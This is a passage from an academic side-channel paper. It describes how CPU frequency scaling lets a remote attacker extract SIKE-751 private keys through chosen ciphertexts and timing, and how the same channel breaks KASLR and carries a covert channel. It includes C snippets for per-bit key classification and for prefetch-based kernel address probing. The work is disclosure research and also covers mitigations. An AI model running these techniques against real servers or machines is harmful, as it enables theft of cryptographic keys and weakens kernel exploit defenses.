The values operated on by SIKE decapsulation are large (a single element of the field underlying SIKE-751 takes 188 bytes to express) and the operations themselves are complex: the inner loop of the Montgomery ladder comprises thousands of lines of hand-optimized assembly. Nevertheless, in Section 5.1, we show that SIKE decapsulation behaves like the much simpler, synthetic senders of Section 4. When mi ≠ mi−1 and the decapsulation algorithm gets stuck, repeatedly producing and operating on 0 values, the processor consumes less power and runs at a higher steady-state frequency (and therefore decapsulation takes a shorter wall time).

Taken together, our findings mean that the server's secret key can be recovered by an adaptive chosen-ciphertext attack, using execution time as a side channel. Having extracted the first i bits of m, the adversary repeatedly queries the server with ciphertexts that should cause decapsulation to get stuck in the (i+1)st round. If the server responds faster than a baseline (established through profiling), the adversary concludes that bit mi is the opposite of bit mi−1; otherwise bit mi is the same. The attacker then proceeds to the next bit. In Section 5.2, we show that the timing signal is so robust that key extraction is possible across a network. We demonstrate full recovery of the (378-bit) private key from the SIKE-751 implementations in two popular, production-ready cryptographic libraries: Cloudflare's Interoperable Reusable Cryptographic Library (CIRCL) [28], written in Go, and Microsoft's PQCrypto-SIDH [66], written in C. Both libraries are hardened against previously known software side channels and meant to run in constant time. Our attack is practical; an unoptimized version recovers the full key from a CIRCL server in 36 hours and from a PQCrypto-SIDH server in 89 hours.

5.1 P-State and SIKE Implementation

We start by verifying that a correct key-bit guess in our chosen-ciphertext attack—one that causes the Montgomery ladder and the remainder of SIKE decapsulation to repeatedly produce 0 values—causes the processor to execute at a higher frequency than an incorrect key-bit guess does. Our local experiment uses 10 randomly generated SIKE-751 server keys. For each key m = (mℓ−1, ..., m0)2, we target 4 out of the 378 bit positions. We choose the target bit positions uniformly at random, to validate that the frequency difference is observable even for bits accessed late in the Montgomery ladder loop. Suppose we target bit i in a secret key m.
Provided that mi ≠ mi−1, we can craft a challenge ciphertext that will trigger an anomalous 0 value in the Montgomery ladder iteration that accesses bit i. However, if mi = mi−1, then there is no challenge ciphertext that can trigger the anomalous 0 value. To make sure we are measuring the effect of anomalous 0 values, and not some other unknown effect, we set up our experiment as follows. For each key m and each target bit index i, we create a variant key m′ that agrees with m at every bit position except index i, where it has the opposite bit value.6 In other words, m′ = m ⊕ 2^i. For each key and each target bit, we launch the decapsulation server and send it concurrent requests carrying the corresponding challenge ciphertext (cf. Figure 9), and we begin measuring once a few seconds of warm-up have elapsed. As in Section 4, we run each experiment in two setups. In the first setup, we use the default system configuration, and monitor the steady-state CPU frequency. In the second setup, we disable SpeedStep/HWP (this way, our CPU stays at the base frequency during the experiment) and monitor (core domain) power consumption. We sample both the CPU frequency and the power consumption every 1 ms. We group the measured data points according to whether we expect the challenge ciphertext to induce an anomalous 0 or not. For each key m and target bit position i, exactly one of m and m′ contributes to the anomalous-0 grouping.

Figure 9: Distribution of the power consumption and the frequency when the challenge ciphertext introduces an anomalous 0 (mi ≠ mi−1) or not (mi = mi−1), using the setups from Section 4 on our i7-9700 CPU. The results are over 10 randomly generated keys, where, for each key, we target 4 out of the 378 bit positions. For each key and each bit, we launch the server with 300 goroutines (CIRCL) or pthreads (PQCrypto-SIDH), each of which handles a single decapsulation request. (a) CIRCL data; (b) PQCrypto-SIDH data. [Histograms of frequency (GHz) and power consumption (W).]

The results, shown in Figures 9a and 9b, confirm that the steady-state frequency is higher and the power consumption is lower when an anomalous 0 is triggered (mi ≠ mi−1) than when it is not (mi = mi−1), for both the CIRCL and the PQCrypto-SIDH decapsulation servers. As noted above, both these libraries are hardened against previously known software side channels and meant to run in constant time. The signal we obtain from PQCrypto-SIDH is fainter than the one we obtain from CIRCL, because PQCrypto-SIDH uses a different strategy for Montgomery reduction that causes the value 0 to be represented in memory sometimes as 0 and sometimes as a prime number of size 751 bits.

5.2 SIKE Key Remote Recovery

We now show that the secret-dependent power consumption and frequency differences observed in Section 5.1 translate to a remotely observable secret-dependent timing difference.

We configure a SIKE target server with a randomly generated static 378-bit key for SIKE-751,7 revealed for comparison only after the attack completes. Our server accepts a client decapsulation request over HTTP (Go) or TCP (C) and spawns a goroutine (Go) or pthread (C) to handle the request. The thread reads in the ciphertext and performs the decapsulation computation, after which it sends a message back to the client indicating the establishment of a shared secret but no other information.
The target server and the attacker are both connected to the same network, and we measure an average round-trip time of 688 µs between the two machines. The attacker simultaneously sends n requests with a challenge ciphertext meant to trigger an anomalous 0 and measures the time t it takes to receive responses for all n requests. When an anomalous 0 is triggered, power decreases, frequency increases, SIKE decapsulation executes faster, and t should be smaller. Based on the observed t and the previously recovered secret key bits, the attacker can infer the value of the target bit, then repeat the attack for the next bit.

For the attack to be successful, we must overcome a number of practical difficulties. First, we must set a value for n, the number of requests, that allows us to observe a clear timing signal when we trigger the anomalous 0s. We experimentally find an n big enough that the frequency increase is remotely observable, but not so big that we induce thrashing.

Second, we must set a time cutoff to distinguish when anomalous 0s are triggered and when they are not. To this end, we collect the decapsulation times when querying the server with a random ciphertext, and use these times to set a cutoff for queries not triggering anomalous 0s. We then query the server with the challenge ciphertexts for the first few bits of the key until we see a speedup compared to the random ciphertext, and use these times to set a cutoff for queries triggering anomalous 0s.

Third, we must detect and recover from mistakes caused by random variations in the server's decapsulation time. Recall that a challenge ciphertext constructed using a wrong value for the i least significant bits of m will never trigger anomalous 0s, regardless of the relationship of mi and mi−1. Measuring no timing reduction in many consecutive rounds is evidence either that many consecutive key bits all have the same value (unlikely since key bits are independent and uniformly distributed), or that the value we are using for the least significant bits of the key is wrong (cf. Appendix A.4). In our experiments, we backtrack when experiments for 40 consecutive bit positions show no timing reduction.

7 The SIKE standard and the implementations we examined place the long-term keypair in the 3-torsion and the ephemeral key used for forming a ciphertext in the 2-torsion, so this is the case we studied. A variant of our attack applies also if the roles are swapped.

Figure 10: Distribution of the timings measured by the attacker during the remote key extraction attack, with the server running on an i7-9700 CPU. The attacker makes 300 (CIRCL) and 1000 (PQCrypto-SIDH) connections (all with the same challenge ciphertext, constructed as per Section 5.3.2) and measures the time until the last connection completes. We group the execution time (filtered) of each key bit extraction based on whether it should have triggered an anomalous 0 in the Montgomery ladder (i.e., whether mi = 1−mi−1 or not). (a) CIRCL histogram; (b) PQCrypto-SIDH histogram. [Histograms of time (ms).]

Finally, there is a chance that a challenge ciphertext constructed as in Section 5.3.2 will accidentally trigger an anomalous 0 later in the decapsulation process even if it does not at the target bit index i of the Montgomery ladder. This will happen
with exponentially small probability for most bit indices, but larger probability for the last few bit indices. We defer a detailed explanation to Appendix A.3. It may be possible to avoid triggering this misbehavior with a different way of constructing the challenge ciphertext. We instead sidestep it by stopping our interaction with the server after extracting all but the last 14 bits; we recover these last bits by brute-force search.

Attack Setup We run the SIKE target server on our i7-9700 CPU using the default system configuration. In the attack on CIRCL, the server is an HTTP server written using Go's net/http library, which handles each request in a goroutine. In the attack on PQCrypto-SIDH, the server is a TCP server written in C, which handles each request in a pthread.

We configure the attacker to send n = 300 concurrent requests in the CIRCL case, and n = 1000 requests in the PQCrypto-SIDH case. In both cases, concurrent requests are all sent with the same challenge ciphertext (constructed as described in Section 5.3.2), and the attacker measures the time until the last connection completes. We experimentally determine the expected timings when the CPU frequency increases because of anomalous 0s and when it does not: for CIRCL, at most 660.2 ms and at least 662.5 ms, respectively; for PQCrypto-SIDH, at most 1556 ms and at least 1558 ms, respectively. We repeat the measurement 400 times, exclude outliers (CIRCL: below 650 ms or above 675 ms; PQCrypto-SIDH: below 1500 ms or above 1580 ms), compute the median of the remaining values, and compare to the cutoffs. If the result is inconclusive for a bit, we repeat the attack on that bit. We use our side channel to extract the key up to bit 364 and recover the last 14 bits by brute-force search.

Results In Figure 10a and Figure 10b, we show the timing distribution of the 300-connection runs (CIRCL) and 1000-connection runs (PQCrypto-SIDH), respectively, grouped according to whether the challenge ciphertext of that run triggered an anomalous 0 (mi ≠ mi−1) or not (mi = mi−1). For the first and the last 20 bit positions of the key that we extract by interacting with the server (bits 0–19 and 345–364, respectively), we plot, in Figure 11 (CIRCL) and Figure 12 (PQCrypto-SIDH), the median time among the 400 measurements for that bit and whether the run triggered an anomalous 0 (mi ≠ mi−1) or not (mi = mi−1) at that bit position. The signal is strong for both the top bits and the bottom bits.

Figure 11: Median times used to extract the first 20 bits (0 to 19) and the last 20 bits (345 to 364) of the key for the same attack against CIRCL SIKE-751 as in Figure 10a. The timings depend on whether the challenge ciphertext triggered an anomalous 0 (mi ≠ mi−1) or not (mi = mi−1). (a) CIRCL first 20 bits; (b) CIRCL last 20 bits. [Median time (ms) vs secret key bit index.]

Figure 12: Median times used to extract the first 20 bits (0 to 19) and the last 20 bits (345 to 364) of the key for the same attack against PQCrypto-SIDH SIKE-751 as in Figure 10b. The timings depend on whether the challenge ciphertext triggered an anomalous 0 (mi ≠ mi−1) or not (mi = mi−1). (a) PQCrypto-SIDH first 20 bits; (b) PQCrypto-SIDH last 20 bits. [Median time (ms) vs secret key bit index.]
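Putting the Attack Setup together, the per-bit decision reduces to filtering, a median, and a comparison against the two profiled cutoffs. The sketch below uses the CIRCL constants quoted above; collecting the 400 batch timings (each the time until the last of the n concurrent requests completes) is left to the attacker's own client and is not shown:

#include <stdlib.h>

/* Decide one key bit from a set of batch timings (in ms).
 * Returns +1 if the anomalous 0 appears triggered (m_i != m_{i-1}),
 * -1 if not (m_i == m_{i-1}), and 0 if inconclusive (repeat the bit). */
static int cmp_double(const void *a, const void *b)
{
    double x = *(const double *)a, y = *(const double *)b;
    return (x > y) - (x < y);
}

int classify_bit(const double *times_ms, int n_meas)   /* e.g. 400 batch timings */
{
    const double lo_out = 650.0, hi_out = 675.0;       /* outlier filter (CIRCL) */
    const double fast_cut = 660.2, slow_cut = 662.5;   /* profiled cutoffs (CIRCL) */

    double *kept = malloc(sizeof(double) * n_meas);
    int k = 0;
    for (int i = 0; i < n_meas; i++)
        if (times_ms[i] > lo_out && times_ms[i] < hi_out)
            kept[k++] = times_ms[i];
    if (k == 0) { free(kept); return 0; }

    qsort(kept, k, sizeof(double), cmp_double);
    double median = kept[k / 2];
    free(kept);

    if (median <= fast_cut) return +1;   /* decapsulation sped up: bit differs */
    if (median >= slow_cut) return -1;   /* baseline timing: bit is the same */
    return 0;
}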
Both attacks successfully recovered the full secret key. The attack on CIRCL completed in 36 hours, while the attack on PQCrypto-SIDH completed in 89 hours. We expect that the attack running time could be reduced with careful optimization. Unlike our attack on CIRCL, our attack on PQCrypto-SIDH made 1 mistake and needed to backtrack; see Appendix A.4 for our error correction strategy.

5.3 Anomalous 0s in SIKE Decapsulation

We now explain how an attacker can construct SIKE ciphertexts that trigger an anomalous 0 in the (i+1)st iteration of the Montgomery ladder when mi ≠ mi−1, and why that anomalous 0, once generated, causes the remainder of the decapsulation algorithm to also produce 0s repeatedly. We briefly recall some relevant mathematical background in Appendix A.2. We recommend that readers review a longer introduction to the math behind elliptic curves, isogenies, and SIKE; Costello's tutorial expositions of elliptic curves [18] and isogenies [19] are especially good choices.

The first subroutine in the SIKE decapsulation algorithm recovers (the Montgomery coefficient A of) the curve E′0 on which the points P, Q, and Q−P, included in the ciphertext provided by the attacker, lie. This subroutine is fast and independent of the secret key; we do not consider it further.

The second subroutine uses the Montgomery three-point ladder to compute P + [m]Q on the curve E′0 recovered by the first subroutine. This is the subroutine in which a correct key-bit guess (mi ≠ mi−1) can trigger the generation of an anomalous 0 value. We explain how in Section 5.3.2.

The third subroutine evaluates the isogeny corresponding to the point P + [m]Q, computing (the Montgomery coefficient of) the curve E′e3 that is the image of E′0 under that isogeny. The fourth subroutine computes the j-invariant of the curve E′e3; this j-invariant is the shared SIDH secret. In Section 5.3.3 and Appendix A.3, we explain how an anomalous 0 value output by the Montgomery ladder causes the isogeny evaluation (third subroutine) and the j-invariant computation (fourth subroutine) to produce additional anomalous 0s.

The final step in SIKE decapsulation is a Fujisaki–Okamoto consistency check [31, 44] that checks that the ciphertext was properly generated. If the check fails, the recipient generates a random session key instead of the one prescribed by the (invalid) ciphertext. The Fujisaki–Okamoto check immunizes SIKE against attacks, such as that due to Galbraith et al. [32], that require partial information about the j-invariant computed when decapsulating (invalid) ciphertexts. We do not claim to invalidate SIKE's proof of security. None of the ciphertexts we construct in our attack passes the Fujisaki–Okamoto check. Nevertheless, our attack recovers the server's secret key, because we obtain the information we need from the running time of the subroutines performed before the Fujisaki–Okamoto check.

While our paper was under embargo (cf. Section 1), our chosen-ciphertext attack triggering anomalous 0s in SIKE decapsulation, described in this subsection, was independently rediscovered by De Feo et al. [25].

5.3.1 Affine and Projective X-Coordinate Point Representations on Montgomery Curves

A Montgomery curve is defined by the equation E_{A,B}: By^2 = x^3 + Ax^2 + x, with parameters A, B ∈ F_{p^2} such that B(A^2 − 4) ≠ 0. Montgomery curves have properties that make them suitable for efficient, side-channel resistant implementations.
In particular, many operations needed in cryptography can be computed using just the x-coordinate of a point (ignoring the y-coordinate) and just the curve parameter A (ignoring the curve parameter B). The point with x- and y-coordinates both equal to 0, T = (0, 0), is a point of exact order 2 on every Montgomery curve. In projective x-coordinate form, a point with affine x-coordinate x = X/Z is represented as a pair (X : Z) with Z ≠ 0; we write ∼ for equality of projective representations and O for the point at infinity. In this representation, T corresponds to (0 : Z) with Z nonzero.

5.3.2 Anomalous 0s in the Three-Point Ladder

Algorithm 1: Three-point ladder ([52], Appendix A), function Ladder3pt. Input: m = (mℓ−1, ..., m0)2 ∈ Z, (xP, xQ, xQ−P), and (A : 1). Output: (X1 : Z1) ∼ P + [m]Q.

Consider the algorithm xADD that, given points U, V, and W in projective x-coordinate form where W = U − V, computes the point U + V in projective x-coordinate form, as:

X ← ZW · [(XU − ZU)(XV + ZV) + (XU + ZU)(XV − ZV)]^2
Z ← XW · [(XU − ZU)(XV + ZV) − (XU + ZU)(XV − ZV)]^2.

When U − V is any point except O or T, xADD(U, V, U − V) correctly returns U + V. However, when U − V is O or T, xADD(U, V, U − V) misbehaves and returns the invalid projective representation (0 : 0) instead of U + V [21].9 Worse, xADD(U, V, W) will also return (0 : 0) if called with any of U, V, or W equal to (0 : 0), regardless of the value of the other two inputs.10 Repeated applications of xADD can thus get stuck at (0 : 0). We use exactly this fact for our attack.

9 If U − V = O then U = V and therefore (XU : ZU) ∼ (XV : ZV). If U − V = T then U = τT(V), where τT is the translation-by-T map; by a property of Montgomery curves, it follows that (XU : ZU) ∼ (ZV : XV).

10 In this case it does not matter—indeed, does not make sense to ask—whether W = U − V.

Suppose that we can arrange that, at the beginning of iteration k in Ladder3pt, (X2 : Z2) ∼ T, i.e., that X2 = 0 and Z2 is nonzero. There are two cases to consider:

• if mk = 1, then T will be passed into the third argument of xDBLADD, triggering the misbehavior in xADD and causing (X1 : Z1) to be set to (0 : 0).

• otherwise, if mk = 0, then T will instead be passed into the second argument of xDBLADD. This will not trigger the misbehavior in xADD and not produce (0 : 0) as an output. The point (X2 : Z2), which was equal to T, will be overwritten with whatever xADD returns.

In the first case, xADD will get stuck; the second element of the tuple returned by xDBLADD will be (0 : 0) in every subsequent iteration of Ladder3pt's loop, and Ladder3pt will eventually return (0 : 0). In the second case, it is likely that 0 values will not recur during the ladder computation.

It remains to show how the attacker can arrange for (X2 : Z2) to equal T at loop iteration k. Let μi = (mi−1, ..., m0)2 represent the least significant i bits of m. Algorithm Ladder3pt maintains the invariant that, at the beginning of iteration i of the loop, the points (X0 : Z0), (X1 : Z1), and (X2 : Z2) satisfy

(X0 : Z0) ∼ [2^i]Q,   (X1 : Z1) ∼ P + [μi]Q,   (X2 : Z2) ∼ (X0 : Z0) − (X1 : Z1).

Suppose that the attacker, proceeding bit-by-bit, has extracted μk. The attacker picks an arbitrary curve and sets Q to be an arbitrary point on the curve. If mk−1 = 0, the attacker sets

P ← [2^k − μk]Q − T.   (1)

Then, at iteration k of the Ladder3pt loop, we will have (X2 : Z2) ∼ T. If mk = 1, T will be passed as the third argument to xDBLADD, triggering the misbehavior as described above. If mk−1 = 1, the attacker instead sets

P ← T − [μk]Q.   (2)

Then, at iteration k of the Ladder3pt loop, we will have (X1 : Z1) ∼ T. If mk = 0, T will be passed as the third argument to xDBLADD, triggering the misbehavior. To summarize, if mk ≠ mk−1, the crafted input ciphertext will trigger the anomalous 0 misbehavior.
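Both failure modes of xADD described in this subsection can be checked numerically with the reconstructed formulas. The sketch below works over a toy prime field (p = 101) with arbitrary point values; it is only an illustration of the algebra, not SIKE's F_{p^2} arithmetic:

#include <stdint.h>
#include <stdio.h>

#define PRIME 101u   /* toy prime, stand-in for the SIKE field */

static uint32_t md(int64_t v) { return (uint32_t)(((v % PRIME) + PRIME) % PRIME); }

/* xADD(U, V, W) with W = U - V, in projective x-coordinate form. */
static void xadd(uint32_t xu, uint32_t zu, uint32_t xv, uint32_t zv,
                 uint32_t xw, uint32_t zw, uint32_t *x, uint32_t *z)
{
    int64_t a = md((int64_t)(xu + PRIME - zu) * (xv + zv));   /* (XU-ZU)(XV+ZV) */
    int64_t b = md((int64_t)(xu + zu) * (xv + PRIME - zv));   /* (XU+ZU)(XV-ZV) */
    *x = md((int64_t)zw * md((a + b) * (a + b)));             /* ZW*[a+b]^2 */
    *z = md((int64_t)xw * md((a - b) * (a - b)));             /* XW*[a-b]^2 */
}

int main(void)
{
    uint32_t x, z;

    /* Case U - V = T: by footnote 9, (XU : ZU) ~ (ZV : XV);
     * here U = (7 : 3), V = (3 : 7), and W = x(T) = (0 : 1). */
    xadd(7, 3, 3, 7, 0, 1, &x, &z);
    printf("U-V = T     -> (%u : %u)\n", x, z);   /* prints (0 : 0) */

    /* Case where one input is already the invalid representation (0 : 0). */
    xadd(0, 0, 5, 9, 2, 11, &x, &z);
    printf("U = (0 : 0) -> (%u : %u)\n", x, z);   /* prints (0 : 0) */
    return 0;
}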
When generated according to the SIKE specification, P and Q are always linearly independent points of order 3^{e_3} and never produce T or O during the execution of Ladder3pt. When generated according to our algorithm above but with an incorrect key-bit guess, we expect that T or O will be produced only with negligible probability.¹¹ This conjecture is supported by our experiments.

5.3.3 Anomalous 0s in Isogeny Evaluation and j-Invariant Calculation

The next task in SIKE decapsulation, isogeny evaluation, is carried out by algorithm 3_e_iso, which takes as input the point P + [m]Q (in projective x-coordinate form) as output by Ladder3pt, expecting it to be a point of exact order 3^{e_3}. In Appendix A.3, we show that, when invoked on the invalid input (0 : 0), 3_e_iso and its subroutines repeatedly operate on and produce 0 values. Isogeny evaluation in 3_e_iso thus acts as an amplifier for the signal produced by the ladder evaluation in Ladder3pt, making it possible to observe even an anomalous 0 produced in a late Ladder3pt loop iteration.

After isogeny evaluation, the next task in SIKE decapsulation is j-invariant calculation, using algorithm jInvariant. When 3_e_iso returns (0 : 0), jInvariant is invoked with input (0 : 0), every intermediate value it computes is 0, and its return value (the SIDH shared secret) is 0.¹²

5.4 Mitigations

We now describe the mitigation that Cloudflare and Microsoft deployed after we disclosed our attack on SIKE. The mitigation, which was originally proposed by De Feo et al. [25], consists of validating that the ciphertext (public key) encodes a pair of linearly independent points of the correct order 3^{e_3}. This check is performed before running the three-point ladder and prevents attack ciphertexts from being further processed, thus hindering the attack. When running decapsulation on a single thread on our i7-9700 CPU, we found that the mitigation adds a performance overhead of 5% for CIRCL and of 11% for PQCrypto-SIDH.

Footnote 11: This fact allows us not only to distinguish a correct from an incorrect guess for bit m_k but also to detect and recover from mistakes in determining the earlier bits μ_k; see Appendix A.4.
Footnote 12: Note that this output depends on the result of inverting 0 in F_{p^2} in step 15 of jInvariant. The Montgomery inversion algorithms in the implementations we examined have 1/0 = 0 (see Savas and Koç [83]).

6 Timer-free Attacks

We now show that not only can we use the frequency side channel to turn power attacks into remote timing attacks (as we saw in Section 5), but we can also use it to mount timing attacks without a timer. To this end, we use the frequency side channel to mount a KASLR break and a covert channel.

KASLR Break. As in prior work [12, 13, 37, 43, 45, 51, 63, 64], the goal of our (unprivileged) attacker is to de-randomize the kernel base address. Knowledge of the kernel base address is useful for mounting memory corruption exploits. In Linux, the kernel text is placed at a 2 MB boundary in the 0xffffffff80000000 – 0xffffffffc0000000 range [13]. Hence, the kernel can be placed at one of 512 possible offsets.

Prior work has shown that, on Intel and AMD processors, there is a timing and power consumption difference when executing prefetch instructions on a memory address depending on whether that address is mapped or not [43, 63]. This difference can be used to infer the location of the kernel within its predefined region. We show that this power consumption difference also manifests as a CPU frequency difference; a minimal sketch of such a probe, paired with an unprivileged frequency readout, is shown below.
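The following is a minimal sketch of the two ingredients of this KASLR break (it is not our proof-of-concept): a loop of prefetcht0 instructions on one candidate kernel base address, and an unprivileged frequency readout from the cpufreq scaling_cur_freq interface. In our actual setup the frequency is sampled from a separate thread while the sender runs; here the two steps simply alternate, and the candidate address, CPU number, and iteration count are illustrative placeholders.

  #include <stdio.h>
  #include <stdint.h>

  /* Unprivileged CPU-frequency readout (kHz) via the cpufreq sysfs interface. */
  static long read_freq_khz(int cpu) {
      char path[128];
      long khz = -1;
      snprintf(path, sizeof(path),
               "/sys/devices/system/cpu/cpu%d/cpufreq/scaling_cur_freq", cpu);
      FILE *f = fopen(path, "r");
      if (f) { if (fscanf(f, "%ld", &khz) != 1) khz = -1; fclose(f); }
      return khz;
  }

  /* Repeatedly prefetch one candidate kernel base address. Whether the address
   * is mapped changes the power drawn by this loop and, at steady state, the
   * frequency the CPU settles at. Prefetches do not fault on kernel addresses. */
  static void prefetch_probe(uintptr_t candidate, long iters) {
      for (long i = 0; i < iters; i++) {
          __asm__ volatile("prefetcht0 (%0)" :: "r"(candidate) : "memory");
      }
  }

  int main(void) {
      /* Illustrative candidate: one of the 512 possible 2 MB-aligned offsets in
       * 0xffffffff80000000 - 0xffffffffc0000000. A real probe sweeps all 512
       * and runs long enough for the frequency to reach steady state.          */
      uintptr_t candidate = 0xffffffff80000000ULL;

      for (int sample = 0; sample < 10; sample++) {
          prefetch_probe(candidate, 50L * 1000 * 1000);
          printf("candidate %#lx: %ld kHz\n",
                 (unsigned long)candidate, read_freq_khz(0));
      }
      return 0;
  }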
To this end, we build a sender process similar to the ones of Figure 3, but using only prefetcht0 instructions. While the sender runs, a separate thread measures the current CPU frequency using the unprivileged scaling_cur_freq interface of the cpufreq driver. We ran the sender with all 512 possible kernel base addresses, for 10 different randomizations (i.e., repeating across 10 reboots) on our Intel i7-9700 CPU. In all 10 cases, we were able to identify the base address successfully (as verified against the privileged /proc/kallsyms interface). We measured an average steady-state CPU frequency of 4.04 GHz when repeatedly prefetching mapped addresses, and 4.24 GHz when repeatedly prefetching unmapped addresses. The runtime of our unoptimized, proof-of-concept implementation is 2 minutes. This runtime is larger than that of state-of-the-art KASLR breaks, but could be reduced with additional engineering effort.

Covert Channel. As in prior work, our covert channel uses a sender and a receiver. To transmit a 0, the sender executes a loop of or instructions with high HD and HW in their data flow; this loop increases the power consumption and results in lower CPU frequency values. To transmit a 1, the sender executes a loop of shlx instructions with low HD and HW in their data flow; this loop decreases the power consumption and results in higher CPU frequency values. The receiver measures the current CPU frequency using the unprivileged scaling_cur_freq interface of the cpufreq driver. We evaluated our covert channel by transmitting 1 kB of random data on our i7-9700 CPU. Our unoptimized, proof-of-concept implementation achieved a bandwidth of 30 bps with an error rate of 0.03% (average across 10 runs). This bandwidth is similar to that of prior covert channels relying on software-based power measurement interfaces [63, 64].

7 Discussion

Affected CPUs. We successfully reproduced our attack on Intel CPUs from the 8th to the 11th generation of the Core microarchitecture (reported in Table 1). We also tested two desktop CPUs from older generations, namely the i7-6700K (Skylake) and the i7-7700K (Kaby Lake), and found that both models only support Turbo frequencies on single-core workloads: as soon as more than one core is active, the P-state is capped at the base frequency. In our experiments, we were not able to force the frequency into steady state (i.e., below the max turbo frequency) with single-core workloads, and were therefore unable to reproduce our attack on these models.

Besides CPUs from the (client-class) Core microarchitecture, our attack should also work on Intel Xeon (server-class) CPUs, since they use similar P-state management techniques. Additionally, other CPU vendors implement similar DVFS mechanisms and are likely vulnerable. For example, we verified that AMD Ryzen processors are also vulnerable to our attack, featuring a similar HW/HD leakage model and enabling the same SIKE vulnerability that we described in Section 5. We leave reverse engineering the specific characteristics of the AMD leakage model to future work.

Mitigating Leakage via the Frequency Channel. Our attack is enabled by data-dependent frequency adjustments at steady state. As we showed, the affected CPUs enter this state when certain power and thermal limits are hit during a workload's execution. Thus, one approach to mitigating the attack is to reduce the likelihood that the CPU hits these limits.
One workload-independent way to do so is to either disable Turbo Boost, or to disable SpeedStep and HWP from the BIOS. We verified that, with otherwise standard system configurations, both methods cause the frequency to stay fixed at the base frequency during workload execution and never enter steady state, preventing leakage via the frequency side channel. However, this approach significantly reduces system performance. Moreover, it may not be sufficient on system configurations with custom power limits. Indeed, in concurrent work, Liu et al. show that a privileged adversary can extract AES-NI keys using the frequency side channel after reducing the power limits to fractions of their default values [65].

Mitigating Leakage in Ciphers. Another mitigation strategy consists of removing secret-dependent leakage from cryptographic software. For example, SIKE's mitigation discussed in Section 5.4 hinders our attack by preventing attack ciphertexts from triggering secret-dependent computations on 0s. For cryptographic software in general, mitigating the power leakage itself would naturally close the frequency channel. True decoupling would require that all operands have no statistical correlation with secrets, which is only feasible with techniques like fully homomorphic encryption. A more realistic approach exploits the fact that it is not the power usage of each individual operand that is leaked, but an average of the power usage across all operands in a time period. This goal may be achieved using masking/blinding techniques. Prior works have introduced protocol-specific masking techniques for ciphers such as AES [8, 38, 82, 86] and blinding techniques for elliptic-curve cryptography [54]. Automatic masking techniques have also been proposed, either in software [7, 17, 27] or leveraging additional hardware support [26, 33, 41, 42, 79]. However, masked/blinded implementations may still leak in practice via power side channels [4, 5, 34, 69, 81, 84, 85].

Future defenses could also examine the potential of fusing unrelated loops, vectorizing operations, or other methods of interleaving different computations. These approaches could be implemented by combining multiple, normally sequential, computations in the program or by introducing an additional complementary kernel. Effective blinding would require that the combined computation's power trace not be correlated with any secret computation. For example, if we can construct a bit-inverted version of a cryptographic kernel, we can interleave the real kernel and the blinding kernel. Our model of HW and HD provides a starting point for future work on blinding.

8 Conclusion

We discovered that on modern Intel (and AMD) x86 CPUs, DVFS-induced frequency variations depend on the current power consumption, and hence on the data being processed. We showed, for the first time, that the HD and HW of data individually and non-uniformly contribute to power consumption and frequency on modern x86 CPUs. We described a novel chosen-ciphertext attack against SIKE, which uses this knowledge to leak full cryptographic keys via remote timing.

The security implications of our findings are significant. Not only do they expand the attack surface of power side-channel attacks by removing the need for power measurement interfaces, but they also show that, even when implemented as constant time, cryptographic code can still leak via remote timing analysis.
The takeaway is that current cryptographic engineering practices for how to write constant-time code are no longer sufficient to guarantee constant time execution of software on modern, variable-frequency processors. Acknowledgments This work was funded in part through NSF grants 1942888 and 1954521, and gifts from Google, Mozilla, and Qualcomm. Wang was partly supported by a Packard Fellowship (via Brent Waters). We thank our shepherd Michael Schwarz and the anonymous reviewers for their valuable feedback. Availability We have open sourced the code of all the experiments of this paper at https://github.com/FPSG-UIUC/hertzbleed. References [1] Andreas Abel and Jan Reineke. uops.info: Characterizing latency, throughput, and port usage of instructions on Intel microarchitectures. In ASPLOS, 2019. [2] Andreas Abel and Jan Reineke. uiCA: Accurate throughput prediction of basic blocks on recent Intel microarchitectures. In ICS, 2022. [3] Ross Anderson. Security Engineering: A Guide to Building Dependable Distributed Systems, 3rd Edition. John Wiley & Sons, 2020. [4] Josep Balasch, Benedikt Gierlichs, Vincent Grosso, Oscar Reparaz, and François-Xavier Standaert. On the cost of lazy engineering for masked software implementations. In CARDIS, 2014. [5] Sven Bauer. Attacking exponent blinding in RSA without CRT. In COSADE, 2012. [6] Daniel J. Bernstein and Tanja Lange. Montgomery curves and the Montgomery ladder. In Topics in Computational Number Theory Inspired by Peter L. Montgomery. Cambridge University Press, 2017. [7] Alex Biryukov, Daniel Dinu, Yann Le Corre, and Aleksei Udovenko. Optimal first-order boolean masking for embedded iot devices. In CARDIS, 2017. [8] Johannes Blömer, Jorge Guajardo, and Volker Krummel. Provably secure masking of AES. In SAC, 2004. [9] Eric Brier, Christophe Clavier, and Francis Olivier. Correlation power analysis with a leakage model. In CHES, 2004. [10] Len Brown. powercap: restrict energy meter to root access. https: //git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin ux.git/commit/?id=949dd0104c496fa7c14991a23c03c62e4463 7e71, 2020. Accessed on Jun 7, 2022. [11] Ileana Buhan, Lejla Batina, Yuval Yarom, and Patrick Schaumont. SoK: Design tools for side-channel-aware implementions. In ASIACCS, 2022. [12] Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Marina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo Van Bulck, and Yuval Yarom. Fallout: Leaking data on Meltdown-resistant CPUs. In CCS, 2019. [13] Claudio Canella, Michael Schwarz, Martin Haubenwallner, Martin Schwarzl, and Daniel Gruss. KASLR: Break it, fix it, repeat. In ASIACCS, 2020. [14] Suresh Chari, Charanjit Jutla, Josyula R Rao, and Pankaj Rohatgi. A cautionary note regarding evaluation of AES candidates on smart-cards. In AES2, 1999. [15] Yimin Chen, Xiaocong Jin, Jingchao Sun, Rui Zhang, and Yanchao Zhang. POWERFUL: Mobile app fingerprinting via power analysis. In INFOCOM, 2017. [16] Jean-Sébastien Coron. Resistance against differential power analysis for elliptic curve cryptosystems. In CHES, 1999. [17] Jean-Sébastien Coron, Johann Großschädl, Mehdi Tibouchi, and Praveen Kumar Vadnala. Conversion from arithmetic to boolean mask- ing with logarithmic complexity. In FSE, 2015. [18] Craig Costello. Pairings for beginners. Online: https://www.craigc ostello.com.au/s/PairingsForBeginners.pdf, 2012. [19] Craig Costello. Supersingular isogeny key exchange for beginners. In SAC, 2019. [20] Craig Costello. 
